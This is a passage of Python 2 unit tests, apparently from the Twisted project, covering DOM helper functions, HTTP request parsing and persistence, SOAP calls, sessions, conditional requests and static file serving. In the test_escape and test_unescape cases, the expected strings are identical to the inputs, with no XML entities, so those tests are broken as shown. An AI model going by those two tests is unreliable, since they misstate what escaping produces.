actual=domhelpers.getElementsByTagName(doc1, 'foo')[0].nodeName
expected='foo'
self.assertEquals(actual, expected)
el1=doc1.documentElement
actual=domhelpers.getElementsByTagName(el1, 'foo')[0].nodeName
self.assertEqual(actual, expected)
doc2_xml='<a><foo in="a"/><b><foo in="b"/></b><c><foo in="c"/></c><foo in="d"/><foo in="ef"/><g><foo in="g"/><h><foo in="h"/></h></g></a>'
doc2=microdom.parseString(doc2_xml)
tag_list=domhelpers.getElementsByTagName(doc2, 'foo')
actual=''.join([node.getAttribute('in') for node in tag_list])
expected='abcdefgh'
self.assertEquals(actual, expected)
el2=doc2.documentElement
tag_list=domhelpers.getElementsByTagName(el2, 'foo')
actual=''.join([node.getAttribute('in') for node in tag_list])
self.assertEqual(actual, expected)
doc3_xml='''
<a><foo in="a"/>
<b><foo in="b"/>
<d><foo in="d"/>
<g><foo in="g"/></g>
<h><foo in="h"/></h>
</d>
<e><foo in="e"/>
<i><foo in="i"/></i>
</e>
</b>
<c><foo in="c"/>
<f><foo in="f"/>
<j><foo in="j"/></j>
</f>
</c>
</a>'''
doc3=microdom.parseString(doc3_xml)
tag_list=domhelpers.getElementsByTagName(doc3, 'foo')
actual=''.join([node.getAttribute('in') for node in tag_list])
expected='abdgheicfj'
self.assertEquals(actual, expected)
el3=doc3.documentElement
tag_list=domhelpers.getElementsByTagName(el3, 'foo')
actual=''.join([node.getAttribute('in') for node in tag_list])
self.assertEqual(actual, expected)
doc4_xml='<foo><bar></bar><baz><foo/></baz></foo>'
doc4=microdom.parseString(doc4_xml)
actual=domhelpers.getElementsByTagName(doc4, 'foo')
root=doc4.documentElement
expected=[root, root.lastChild().firstChild()]
self.assertEquals(actual, expected)
actual=domhelpers.getElementsByTagName(root, 'foo')
self.assertEqual(actual, expected)
def test_gatherTextNodes(self):
doc1=microdom.parseString('<a>foo</a>')
actual=domhelpers.gatherTextNodes(doc1)
expected='foo'
self.assertEqual(actual, expected)
actual=domhelpers.gatherTextNodes(doc1.documentElement)
self.assertEqual(actual, expected)
doc2_xml='<a>a<b>b</b><c>c</c>def<g>g<h>h</h></g></a>'
doc2=microdom.parseString(doc2_xml)
actual=domhelpers.gatherTextNodes(doc2)
expected='abcdefgh'
self.assertEqual(actual, expected)
actual=domhelpers.gatherTextNodes(doc2.documentElement)
self.assertEqual(actual, expected)
doc3_xml=('<a>a<b>b<d>d<g>g</g><h>h</h></d><e>e<i>i</i></e></b>' +
'<c>c<f>f<j>j</j></f></c></a>')
doc3=microdom.parseString(doc3_xml)
actual=domhelpers.gatherTextNodes(doc3)
expected='abdgheicfj'
self.assertEqual(actual, expected)
actual=domhelpers.gatherTextNodes(doc3.documentElement)
self.assertEqual(actual, expected)
doc4_xml='''<html>
<head>
</head>
<body>
stuff
</body>
</html>
'''
doc4=microdom.parseString(doc4_xml)
actual=domhelpers.gatherTextNodes(doc4)
expected='\n stuff\n '
assert actual==expected, 'expected %s, got %s' % (expected, actual)
actual=domhelpers.gatherTextNodes(doc4.documentElement)
self.assertEqual(actual, expected)
doc5_xml='<x>Soufflé</x>'
doc5=microdom.parseString(doc5_xml)
actual=domhelpers.gatherTextNodes(doc5)
expected='Soufflé'
self.assertEqual(actual, expected)
actual=domhelpers.gatherTextNodes(doc5.documentElement)
self.assertEqual(actual, expected)
def test_clearNode(self):
doc1=microdom.parseString('<a><b><c><d/></c></b></a>')
a_node=doc1.documentElement
domhelpers.clearNode(a_node)
actual=doc1.documentElement.toxml()
expected='<a></a>'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
doc2=microdom.parseString('<a><b><c><d/></c></b></a>')
b_node=doc2.documentElement.childNodes[0]
domhelpers.clearNode(b_node)
actual=doc2.documentElement.toxml()
expected='<a><b></b></a>'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
doc3=microdom.parseString('<a><b><c><d/></c></b></a>')
c_node=doc3.documentElement.childNodes[0].childNodes[0]
domhelpers.clearNode(c_node)
actual=doc3.documentElement.toxml()
expected='<a><b><c></c></b></a>'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
def test_get(self):
doc1=microdom.parseString('<a><b id="bar"/><c class="foo"/></a>')
node=domhelpers.get(doc1, "foo")
actual=node.toxml()
expected='<c class="foo"></c>'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
node=domhelpers.get(doc1, "bar")
actual=node.toxml()
expected='<b id="bar"></b>'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
self.assertRaises(domhelpers.NodeLookupError,
domhelpers.get,
doc1,
"pzork")
def test_getIfExists(self):
doc1=microdom.parseString('<a><b id="bar"/><c class="foo"/></a>')
node=domhelpers.getIfExists(doc1, "foo")
actual=node.toxml()
expected='<c class="foo"></c>'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
node=domhelpers.getIfExists(doc1, "pzork")
assert node==None, 'expected None, didn\'t get None'
def test_getAndClear(self):
doc1=microdom.parseString('<a><b id="foo"><c></c></b></a>')
node=domhelpers.getAndClear(doc1, "foo")
actual=node.toxml()
expected='<b id="foo"></b>'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
def test_locateNodes(self):
doc1=microdom.parseString('<a><b foo="olive"><c foo="olive"/></b><d foo="poopy"/></a>')
node_list=domhelpers.locateNodes(doc1.childNodes, 'foo', 'olive',
noNesting=1)
actual=''.join([node.toxml() for node in node_list])
expected='<b foo="olive"><c foo="olive"></c></b>'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
node_list=domhelpers.locateNodes(doc1.childNodes, 'foo', 'olive',
noNesting=0)
actual=''.join([node.toxml() for node in node_list])
expected='<b foo="olive"><c foo="olive"></c></b><c foo="olive"></c>'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
def test_getParents(self):
doc1=microdom.parseString('<a><b><c><d/></c><e/></b><f/></a>')
node_list=domhelpers.getParents(doc1.childNodes[0].childNodes[0].childNodes[0])
actual=''.join([node.tagName for node in node_list
if hasattr(node, 'tagName')])
expected='cba'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
def test_findElementsWithAttribute(self):
doc1=microdom.parseString('<a foo="1"><b foo="2"/><c foo="1"/><d/></a>')
node_list=domhelpers.findElementsWithAttribute(doc1, 'foo')
actual=''.join([node.tagName for node in node_list])
expected='abc'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
node_list=domhelpers.findElementsWithAttribute(doc1, 'foo', '1')
actual=''.join([node.tagName for node in node_list])
expected='ac'
assert actual==expected, 'expected %s, got %s' % (expected, actual)
def test_findNodesNamed(self):
doc1=microdom.parseString('<doc><foo/><bar/><foo>a</foo></doc>')
node_list=domhelpers.findNodesNamed(doc1, 'foo')
actual=len(node_list)
expected=2
assert actual==expected, 'expected %d, got %d' % (expected, actual)
# NOT SURE WHAT THESE ARE SUPPOSED TO DO..
# def test_RawText FIXME
# def test_superSetAttribute FIXME
# def test_superPrependAttribute FIXME
# def test_superAppendAttribute FIXME
# def test_substitute FIXME
def test_escape(self):
j='this string " contains many & characters> xml< won\'t like'
expected='this string " contains many & characters> xml< won\'t like'
self.assertEqual(domhelpers.escape(j), expected)
def test_unescape(self):
j='this string " has && entities > < and some characters xml won\'t like<'
expected='this string " has && entities > < and some characters xml won\'t like<'
self.assertEqual(domhelpers.unescape(j), expected)
```
#### File: web/test/test_http.py
```python
from __future__ import nested_scopes
from twisted.trial import unittest
from twisted.web import http
from twisted.protocols import loopback
from twisted.internet import protocol
from twisted.test.test_protocols import StringIOWithoutClosing
import string, random, urllib, cgi
class DateTimeTest(unittest.TestCase):
"""Test date parsing functions."""
def testRoundtrip(self):
for i in range(10000):
time = random.randint(0, 2000000000)
timestr = http.datetimeToString(time)
time2 = http.stringToDatetime(timestr)
self.assertEquals(time, time2)
class OrderedDict:
def __init__(self, dict):
self.dict = dict
self.l = dict.keys()
def __setitem__(self, k, v):
self.l.append(k)
self.dict[k] = v
def __getitem__(self, k):
return self.dict[k]
def items(self):
result = []
for i in self.l:
result.append((i, self.dict[i]))
return result
def __getattr__(self, attr):
return getattr(self.dict, attr)
class DummyHTTPHandler(http.Request):
def process(self):
self.headers = OrderedDict(self.headers)
self.content.seek(0, 0)
data = self.content.read()
length = self.getHeader('content-length')
request = "'''\n"+str(length)+"\n"+data+"'''\n"
self.setResponseCode(200)
self.setHeader("Request", self.uri)
self.setHeader("Command", self.method)
self.setHeader("Version", self.clientproto)
self.setHeader("Content-Length", len(request))
self.write(request)
self.finish()
class LoopbackHTTPClient(http.HTTPClient):
def connectionMade(self):
self.sendCommand("GET", "/foo/bar")
self.sendHeader("Content-Length", 10)
self.endHeaders()
self.transport.write("0123456789")
class HTTP1_0TestCase(unittest.TestCase):
requests = '''\
GET / HTTP/1.0
GET / HTTP/1.1
Accept: text/html
'''
requests = string.replace(requests, '\n', '\r\n')
expected_response = "HTTP/1.0 200 OK\015\012Request: /\015\012Command: GET\015\012Version: HTTP/1.0\015\012Content-length: 13\015\012\015\012'''\012None\012'''\012"
def testBuffer(self):
b = StringIOWithoutClosing()
a = http.HTTPChannel()
a.requestFactory = DummyHTTPHandler
a.makeConnection(protocol.FileWrapper(b))
# one byte at a time, to stress it.
for byte in self.requests:
a.dataReceived(byte)
a.connectionLost(IOError("all one"))
value = b.getvalue()
if value != self.expected_response:
for i in range(len(value)):
if len(self.expected_response) <= i:
print `value[i-5:i+10]`, `self.expected_response[i-5:i+10]`
elif value[i] != self.expected_response[i]:
print `value[i-5:i+10]`, `self.expected_response[i-5:i+10]`
break
print '---VALUE---'
print repr(value)
print '---EXPECTED---'
print repr(self.expected_response)
raise AssertionError
class HTTP1_1TestCase(HTTP1_0TestCase):
requests = '''\
GET / HTTP/1.1
Accept: text/html
POST / HTTP/1.1
Content-Length: 10
0123456789POST / HTTP/1.1
Content-Length: 10
0123456789HEAD / HTTP/1.1
'''
requests = string.replace(requests, '\n', '\r\n')
expected_response = "HTTP/1.1 200 OK\015\012Request: /\015\012Command: GET\015\012Version: HTTP/1.1\015\012Content-length: 13\015\012\015\012'''\012None\012'''\012HTTP/1.1 200 OK\015\012Request: /\015\012Command: POST\015\012Version: HTTP/1.1\015\012Content-length: 21\015\012\015\012'''\01210\0120123456789'''\012HTTP/1.1 200 OK\015\012Request: /\015\012Command: POST\015\012Version: HTTP/1.1\015\012Content-length: 21\015\012\015\012'''\01210\0120123456789'''\012HTTP/1.1 200 OK\015\012Request: /\015\012Command: HEAD\015\012Version: HTTP/1.1\015\012Content-length: 13\015\012\015\012"
class HTTP1_1_close_TestCase(HTTP1_0TestCase):
requests = '''\
GET / HTTP/1.1
Accept: text/html
Connection: close
GET / HTTP/1.0
'''
requests = string.replace(requests, '\n', '\r\n')
expected_response = "HTTP/1.1 200 OK\015\012Connection: close\015\012Request: /\015\012Command: GET\015\012Version: HTTP/1.1\015\012Content-length: 13\015\012\015\012'''\012None\012'''\012"
class HTTP0_9TestCase(HTTP1_0TestCase):
requests = '''\
GET /
'''
requests = string.replace(requests, '\n', '\r\n')
expected_response = "HTTP/1.1 400 Bad Request\r\n\r\n"
class HTTPLoopbackTestCase(unittest.TestCase):
expectedHeaders = {'request' : '/foo/bar',
'command' : 'GET',
'version' : 'HTTP/1.0',
'content-length' : '21'}
numHeaders = 0
gotStatus = 0
gotResponse = 0
gotEndHeaders = 0
def _handleStatus(self, version, status, message):
self.gotStatus = 1
self.assertEquals(version, "HTTP/1.0")
self.assertEquals(status, "200")
def _handleResponse(self, data):
self.gotResponse = 1
self.assertEquals(data, "'''\n10\n0123456789'''\n")
def _handleHeader(self, key, value):
self.numHeaders = self.numHeaders + 1
self.assertEquals(self.expectedHeaders[string.lower(key)], value)
def _handleEndHeaders(self):
self.gotEndHeaders = 1
self.assertEquals(self.numHeaders, 4)
def testLoopback(self):
server = http.HTTPChannel()
server.requestFactory = DummyHTTPHandler
client = LoopbackHTTPClient()
client.handleResponse = self._handleResponse
client.handleHeader = self._handleHeader
client.handleEndHeaders = self._handleEndHeaders
client.handleStatus = self._handleStatus
d = loopback.loopbackAsync(server, client)
d.addCallback(self._cbTestLoopback)
return d
def _cbTestLoopback(self, ignored):
if not (self.gotStatus and self.gotResponse and self.gotEndHeaders):
raise RuntimeError(
"didn't got all callbacks %s"
% [self.gotStatus, self.gotResponse, self.gotEndHeaders])
del self.gotEndHeaders
del self.gotResponse
del self.gotStatus
del self.numHeaders
class PRequest:
"""Dummy request for persistence tests."""
def __init__(self, **headers):
self.received_headers = headers
self.headers = {}
def getHeader(self, k):
return self.received_headers.get(k, '')
def setHeader(self, k, v):
self.headers[k] = v
class PersistenceTestCase(unittest.TestCase):
"""Tests for persistent HTTP connections."""
ptests = [#(PRequest(connection="Keep-Alive"), "HTTP/1.0", 1, {'connection' : 'Keep-Alive'}),
(PRequest(), "HTTP/1.0", 0, {'connection': None}),
(PRequest(connection="close"), "HTTP/1.1", 0, {'connection' : 'close'}),
(PRequest(), "HTTP/1.1", 1, {'connection': None}),
(PRequest(), "HTTP/0.9", 0, {'connection': None}),
]
def testAlgorithm(self):
c = http.HTTPChannel()
for req, version, correctResult, resultHeaders in self.ptests:
result = c.checkPersistence(req, version)
self.assertEquals(result, correctResult)
for header in resultHeaders.keys():
self.assertEquals(req.headers.get(header, None), resultHeaders[header])
class ChunkingTestCase(unittest.TestCase):
strings = ["abcv", "", "fdfsd423", "Ffasfas\r\n",
"523523\n\rfsdf", "4234"]
def testChunks(self):
for s in self.strings:
self.assertEquals((s, ''), http.fromChunk(''.join(http.toChunk(s))))
self.assertRaises(ValueError, http.fromChunk, '-5\r\nmalformed!\r\n')
def testConcatenatedChunks(self):
chunked = ''.join([''.join(http.toChunk(t)) for t in self.strings])
result = []
buffer = ""
for c in chunked:
buffer = buffer + c
try:
data, buffer = http.fromChunk(buffer)
result.append(data)
except ValueError:
pass
self.assertEquals(result, self.strings)
class ParsingTestCase(unittest.TestCase):
def runRequest(self, httpRequest, requestClass, success=1):
httpRequest = httpRequest.replace("\n", "\r\n")
b = StringIOWithoutClosing()
a = http.HTTPChannel()
a.requestFactory = requestClass
a.makeConnection(protocol.FileWrapper(b))
# one byte at a time, to stress it.
for byte in httpRequest:
if a.transport.closed:
break
a.dataReceived(byte)
a.connectionLost(IOError("all done"))
if success:
self.assertEquals(self.didRequest, 1)
del self.didRequest
else:
self.assert_(not hasattr(self, "didRequest"))
def testBasicAuth(self):
testcase = self
class Request(http.Request):
l = []
def process(self):
testcase.assertEquals(self.getUser(), self.l[0])
testcase.assertEquals(self.getPassword(), self.l[1])
for u, p in [("foo", "bar"), ("hello", "there:z")]:
Request.l[:] = [u, p]
s = "%s:%s" % (u, p)
f = "GET / HTTP/1.0\nAuthorization: Basic %s\n\n" % (s.encode("base64").strip(), )
self.runRequest(f, Request, 0)
def testTooManyHeaders(self):
httpRequest = "GET / HTTP/1.0\n"
for i in range(502):
httpRequest += "%s: foo\n" % i
httpRequest += "\n"
class MyRequest(http.Request):
def process(self):
raise RuntimeError, "should not get called"
self.runRequest(httpRequest, MyRequest, 0)
def testHeaders(self):
httpRequest = """\
GET / HTTP/1.0
Foo: bar
baz: 1 2 3
"""
testcase = self
class MyRequest(http.Request):
def process(self):
testcase.assertEquals(self.getHeader('foo'), 'bar')
testcase.assertEquals(self.getHeader('Foo'), 'bar')
testcase.assertEquals(self.getHeader('bAz'), '1 2 3')
testcase.didRequest = 1
self.finish()
self.runRequest(httpRequest, MyRequest)
def testCookies(self):
"""
Test cookies parsing and reading.
"""
httpRequest = '''\
GET / HTTP/1.0
Cookie: rabbit="eat carrot"; ninja=secret; spam="hey 1=1!"
'''
testcase = self
class MyRequest(http.Request):
def process(self):
testcase.assertEquals(self.getCookie('rabbit'), '"eat carrot"')
testcase.assertEquals(self.getCookie('ninja'), 'secret')
testcase.assertEquals(self.getCookie('spam'), '"hey 1=1!"')
testcase.didRequest = 1
self.finish()
self.runRequest(httpRequest, MyRequest)
def testGET(self):
httpRequest = '''\
GET /?key=value&multiple=two+words&multiple=more%20words&empty= HTTP/1.0
'''
testcase = self
class MyRequest(http.Request):
def process(self):
testcase.assertEquals(self.method, "GET")
testcase.assertEquals(self.args["key"], ["value"])
testcase.assertEquals(self.args["empty"], [""])
testcase.assertEquals(self.args["multiple"], ["two words", "more words"])
testcase.didRequest = 1
self.finish()
self.runRequest(httpRequest, MyRequest)
def test_extraQuestionMark(self):
"""
While only a single '?' is allowed in an URL, several other servers
allow several and pass all after the first through as part of the
query arguments. Test that we emulate this behavior.
"""
httpRequest = 'GET /foo?bar=?&baz=quux HTTP/1.0\n\n'
testcase = self
class MyRequest(http.Request):
def process(self):
testcase.assertEqual(self.method, 'GET')
testcase.assertEqual(self.path, '/foo')
testcase.assertEqual(self.args['bar'], ['?'])
testcase.assertEqual(self.args['baz'], ['quux'])
testcase.didRequest = 1
self.finish()
self.runRequest(httpRequest, MyRequest)
def testPOST(self):
query = 'key=value&multiple=two+words&multiple=more%20words&empty='
httpRequest = '''\
POST / HTTP/1.0
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
%s''' % (len(query), query)
testcase = self
class MyRequest(http.Request):
def process(self):
testcase.assertEquals(self.method, "POST")
testcase.assertEquals(self.args["key"], ["value"])
testcase.assertEquals(self.args["empty"], [""])
testcase.assertEquals(self.args["multiple"], ["two words", "more words"])
testcase.didRequest = 1
self.finish()
self.runRequest(httpRequest, MyRequest)
def testMissingContentDisposition(self):
req = '''\
POST / HTTP/1.0
Content-Type: multipart/form-data; boundary=AaB03x
Content-Length: 103
--AaB03x
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
abasdfg
--AaB03x--
'''
self.runRequest(req, http.Request, success=False)
class QueryArgumentsTestCase(unittest.TestCase):
def testUnquote(self):
try:
from twisted.protocols import _c_urlarg
except ImportError:
raise unittest.SkipTest("_c_urlarg module is not available")
# work exactly like urllib.unquote, including stupid things
# % followed by a non-hexdigit in the middle and in the end
self.failUnlessEqual(urllib.unquote("%notreally%n"),
_c_urlarg.unquote("%notreally%n"))
# % followed by hexdigit, followed by non-hexdigit
self.failUnlessEqual(urllib.unquote("%1quite%1"),
_c_urlarg.unquote("%1quite%1"))
# unquoted text, followed by some quoted chars, ends in a trailing %
self.failUnlessEqual(urllib.unquote("blah%21%40%23blah%"),
_c_urlarg.unquote("blah%21%40%23blah%"))
# Empty string
self.failUnlessEqual(urllib.unquote(""), _c_urlarg.unquote(""))
def testParseqs(self):
self.failUnlessEqual(cgi.parse_qs("a=b&d=c;+=f"),
http.parse_qs("a=b&d=c;+=f"))
self.failUnlessRaises(ValueError, http.parse_qs, "blah",
strict_parsing = 1)
self.failUnlessEqual(cgi.parse_qs("a=&b=c", keep_blank_values = 1),
http.parse_qs("a=&b=c", keep_blank_values = 1))
self.failUnlessEqual(cgi.parse_qs("a=&b=c"),
http.parse_qs("a=&b=c"))
def testEscchar(self):
try:
from twisted.protocols import _c_urlarg
except ImportError:
raise unittest.SkipTest("_c_urlarg module is not available")
self.failUnlessEqual("!@#+b",
_c_urlarg.unquote("+21+40+23+b", "+"))
class ClientDriver(http.HTTPClient):
def handleStatus(self, version, status, message):
self.version = version
self.status = status
self.message = message
class ClientStatusParsing(unittest.TestCase):
def testBaseline(self):
c = ClientDriver()
c.lineReceived('HTTP/1.0 201 foo')
self.failUnlessEqual(c.version, 'HTTP/1.0')
self.failUnlessEqual(c.status, '201')
self.failUnlessEqual(c.message, 'foo')
def testNoMessage(self):
c = ClientDriver()
c.lineReceived('HTTP/1.0 201')
self.failUnlessEqual(c.version, 'HTTP/1.0')
self.failUnlessEqual(c.status, '201')
self.failUnlessEqual(c.message, '')
def testNoMessage_trailingSpace(self):
c = ClientDriver()
c.lineReceived('HTTP/1.0 201 ')
self.failUnlessEqual(c.version, 'HTTP/1.0')
self.failUnlessEqual(c.status, '201')
self.failUnlessEqual(c.message, '')
```
#### File: web/test/test_soap.py
```python
try:
import SOAPpy
except ImportError:
SOAPpy = None
class SOAPPublisher: pass
else:
from twisted.web import soap
SOAPPublisher = soap.SOAPPublisher
from twisted.trial import unittest
from twisted.web import server, error
from twisted.internet import reactor, defer
class Test(SOAPPublisher):
def soap_add(self, a, b):
return a + b
def soap_kwargs(self, a=1, b=2):
return a + b
soap_kwargs.useKeywords=True
def soap_triple(self, string, num):
return [string, num, None]
def soap_struct(self):
return SOAPpy.structType({"a": "c"})
def soap_defer(self, x):
return defer.succeed(x)
def soap_deferFail(self):
return defer.fail(ValueError())
def soap_fail(self):
raise RuntimeError
def soap_deferFault(self):
return defer.fail(ValueError())
def soap_complex(self):
return {"a": ["b", "c", 12, []], "D": "foo"}
def soap_dict(self, map, key):
return map[key]
class SOAPTestCase(unittest.TestCase):
def setUp(self):
self.publisher = Test()
self.p = reactor.listenTCP(0, server.Site(self.publisher),
interface="127.0.0.1")
self.port = self.p.getHost().port
def tearDown(self):
return self.p.stopListening()
def proxy(self):
return soap.Proxy("http://127.0.0.1:%d/" % self.port)
def testResults(self):
inputOutput = [
("add", (2, 3), 5),
("defer", ("a",), "a"),
("dict", ({"a": 1}, "a"), 1),
("triple", ("a", 1), ["a", 1, None])]
dl = []
for meth, args, outp in inputOutput:
d = self.proxy().callRemote(meth, *args)
d.addCallback(self.assertEquals, outp)
dl.append(d)
# SOAPpy kinda blows.
d = self.proxy().callRemote('complex')
d.addCallback(lambda result: result._asdict())
d.addCallback(self.assertEquals, {"a": ["b", "c", 12, []], "D": "foo"})
dl.append(d)
# We now return to our regularly scheduled program, already in progress.
return defer.DeferredList(dl, fireOnOneErrback=True)
def testMethodNotFound(self):
"""
Check that a non existing method return error 500.
"""
d = self.proxy().callRemote('doesntexist')
self.assertFailure(d, error.Error)
def cb(err):
self.assertEquals(int(err.status), 500)
d.addCallback(cb)
return d
def testLookupFunction(self):
"""
Test lookupFunction method on publisher, to see available remote
methods.
"""
self.assertTrue(self.publisher.lookupFunction("add"))
self.assertTrue(self.publisher.lookupFunction("fail"))
self.assertFalse(self.publisher.lookupFunction("foobar"))
if not SOAPpy:
SOAPTestCase.skip = "SOAPpy not installed"
```
#### File: web/test/test_web.py
```python
from twisted.trial import unittest
import string, random, copy
from cStringIO import StringIO
from twisted.web import server, resource, util
from twisted.internet import defer, interfaces, error
from twisted.web import http
from twisted.protocols import loopback
from twisted.python import log, reflect
from twisted.internet.address import IPv4Address
from zope.interface import implements
class DummyRequest:
uri='http://dummy/'
method = 'GET'
def getHeader(self, h):
return None
def registerProducer(self, prod,s):
self.go = 1
while self.go:
prod.resumeProducing()
def unregisterProducer(self):
self.go = 0
def __init__(self, postpath, session=None):
self.sitepath = []
self.written = []
self.finished = 0
self.postpath = postpath
self.prepath = []
self.session = None
self.protoSession = session or server.Session(0, self)
self.args = {}
self.outgoingHeaders = {}
def setHeader(self, name, value):
"""TODO: make this assert on write() if the header is content-length
"""
self.outgoingHeaders[name.lower()] = value
def getSession(self):
if self.session:
return self.session
assert not self.written, "Session cannot be requested after data has been written."
self.session = self.protoSession
return self.session
def write(self, data):
self.written.append(data)
def finish(self):
self.finished = self.finished + 1
def addArg(self, name, value):
self.args[name] = [value]
def setResponseCode(self, code):
assert not self.written, "Response code cannot be set after data has been written: %s." % string.join(self.written, "@@@@")
def setLastModified(self, when):
assert not self.written, "Last-Modified cannot be set after data has been written: %s." % string.join(self.written, "@@@@")
def setETag(self, tag):
assert not self.written, "ETag cannot be set after data has been written: %s." % string.join(self.written, "@@@@")
class ResourceTestCase(unittest.TestCase):
def testListEntities(self):
r = resource.Resource()
self.failUnlessEqual([], r.listEntities())
class SimpleResource(resource.Resource):
def render(self, request):
if http.CACHED in (request.setLastModified(10),
request.setETag('MatchingTag')):
return ''
else:
return "correct"
class SiteTest(unittest.TestCase):
def testSimplestSite(self):
sres1 = SimpleResource()
sres2 = SimpleResource()
sres1.putChild("",sres2)
site = server.Site(sres1)
assert site.getResourceFor(DummyRequest([''])) is sres2, "Got the wrong resource."
class SessionTest(unittest.TestCase):
def setUp(self):
self.site = server.Site(SimpleResource())
def test_delayedCallCleanup(self):
"""Checking to make sure Sessions do not leave extra DelayedCalls.
"""
from twisted.internet import reactor
delayedCallsBeforeSession = repr(reactor.getDelayedCalls())
session = self.site.makeSession()
session.touch()
session.expire()
self.failUnlessEqual(delayedCallsBeforeSession,
repr(reactor.getDelayedCalls()))
# Conditional requests:
# If-None-Match, If-Modified-Since
# make conditional request:
# normal response if condition succeeds
# if condition fails:
# response code
# no body
def httpBody(whole):
return whole.split('\r\n\r\n', 1)[1]
def httpHeader(whole, key):
key = key.lower()
headers = whole.split('\r\n\r\n', 1)[0]
for header in headers.split('\r\n'):
if header.lower().startswith(key):
return header.split(':', 1)[1].strip()
return None
def httpCode(whole):
l1 = whole.split('\r\n', 1)[0]
return int(l1.split()[1])
class ConditionalTest(unittest.TestCase):
"""web.server's handling of conditional requests for cache validation."""
# XXX: test web.distrib.
def setUp(self):
self.resrc = SimpleResource()
self.resrc.putChild('', self.resrc)
self.site = server.Site(self.resrc)
self.site = server.Site(self.resrc)
self.site.logFile = log.logfile
# HELLLLLLLLLLP! This harness is Very Ugly.
self.channel = self.site.buildProtocol(None)
self.transport = http.StringTransport()
self.transport.close = lambda *a, **kw: None
self.transport.disconnecting = lambda *a, **kw: 0
self.transport.getPeer = lambda *a, **kw: "peer"
self.transport.getHost = lambda *a, **kw: "host"
self.channel.makeConnection(self.transport)
for l in ["GET / HTTP/1.1",
"Accept: text/html"]:
self.channel.lineReceived(l)
def tearDown(self):
self.channel.connectionLost(None)
def test_modified(self):
"""If-Modified-Since cache validator (positive)"""
self.channel.lineReceived("If-Modified-Since: %s"
% http.datetimeToString(1))
self.channel.lineReceived('')
result = self.transport.getvalue()
self.failUnlessEqual(httpCode(result), http.OK)
self.failUnlessEqual(httpBody(result), "correct")
def test_unmodified(self):
"""If-Modified-Since cache validator (negative)"""
self.channel.lineReceived("If-Modified-Since: %s"
% http.datetimeToString(100))
self.channel.lineReceived('')
result = self.transport.getvalue()
self.failUnlessEqual(httpCode(result), http.NOT_MODIFIED)
self.failUnlessEqual(httpBody(result), "")
def test_etagMatchedNot(self):
"""If-None-Match ETag cache validator (positive)"""
self.channel.lineReceived("If-None-Match: unmatchedTag")
self.channel.lineReceived('')
result = self.transport.getvalue()
self.failUnlessEqual(httpCode(result), http.OK)
self.failUnlessEqual(httpBody(result), "correct")
def test_etagMatched(self):
"""If-None-Match ETag cache validator (negative)"""
self.channel.lineReceived("If-None-Match: MatchingTag")
self.channel.lineReceived('')
result = self.transport.getvalue()
self.failUnlessEqual(httpHeader(result, "ETag"), "MatchingTag")
self.failUnlessEqual(httpCode(result), http.NOT_MODIFIED)
self.failUnlessEqual(httpBody(result), "")
from twisted.web import google
class GoogleTestCase(unittest.TestCase):
def testCheckGoogle(self):
raise unittest.SkipTest("no violation of google ToS")
d = google.checkGoogle('site:www.twistedmatrix.com twisted')
d.addCallback(self.assertEquals, 'http://twistedmatrix.com/')
return d
from twisted.web import static
from twisted.web import script
class StaticFileTest(unittest.TestCase):
def testStaticPaths(self):
import os
dp = os.path.join(self.mktemp(),"hello")
ddp = os.path.join(dp, "goodbye")
tp = os.path.abspath(os.path.join(dp,"world.txt"))
tpy = os.path.join(dp,"wyrld.rpy")
os.makedirs(dp)
f = open(tp,"wb")
f.write("hello world")
f = open(tpy, "wb")
f.write("""
from twisted.web.static import Data
resource = Data('dynamic world','text/plain')
""")
f = static.File(dp)
f.processors = {
'.rpy': script.ResourceScript,
}
f.indexNames = f.indexNames + ['world.txt']
self.assertEquals(f.getChild('', DummyRequest([''])).path,
tp)
self.assertEquals(f.getChild('wyrld.rpy', DummyRequest(['wyrld.rpy'])
).__class__,
static.Data)
f = static.File(dp)
wtextr = DummyRequest(['world.txt'])
wtext = f.getChild('world.txt', wtextr)
self.assertEquals(wtext.path, tp)
wtext.render(wtextr)
self.assertEquals(wtextr.outgoingHeaders.get('content-length'),
str(len('hello world')))
self.assertNotEquals(f.getChild('', DummyRequest([''])).__class__,
static.File)
def testIgnoreExt(self):
f = static.File(".")
f.ignoreExt(".foo")
self.assertEquals(f.ignoredExts, [".foo"])
f = static.File(".")
self.assertEquals(f.ignoredExts, [])
f = static.File(".", ignoredExts=(".bar", ".baz"))
self.assertEquals(f.ignoredExts, [".bar", ".baz"])
def testIgnoredExts(self):
import os
dp = os.path.join(self.mktemp(), 'allYourBase')
fp = os.path.join(dp, 'AreBelong.ToUs')
os.makedirs(dp)
open(fp, 'wb').write("Take off every 'Zig'!!")
f = static.File(dp)
f.ignoreExt('.ToUs')
dreq = DummyRequest([''])
child_without_ext = f.getChild('AreBelong', dreq)
self.assertNotEquals(child_without_ext, f.childNotFound)
class DummyChannel:
class TCP:
port = 80
def getPeer(self):
return IPv4Address("TCP", 'client.example.com', 12344)
def getHost(self):
return IPv4Address("TCP", 'example.com', self.port)
class SSL(TCP):
implements(interfaces.ISSLTransport)
transport = TCP()
site = server.Site(resource.Resource())
class TestRequest(unittest.TestCase):
def testChildLink(self):
request = server.Request(DummyChannel(), 1)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.childLink('baz'), 'bar/baz')
request = server.Request(DummyChannel(), 1)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar/', 'HTTP/1.0')
self.assertEqual(request.childLink('baz'), 'baz')
def testPrePathURLSimple(self):
request = server.Request(DummyChannel(), 1)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
request.setHost('example.com', 80)
self.assertEqual(request.prePathURL(), 'http://example.com/foo/bar')
def testPrePathURLNonDefault(self):
d = DummyChannel()
d.transport = DummyChannel.TCP()
d.transport.port = 81
request = server.Request(d, 1)
request.setHost('example.com', 81)
request.gotLength(0)
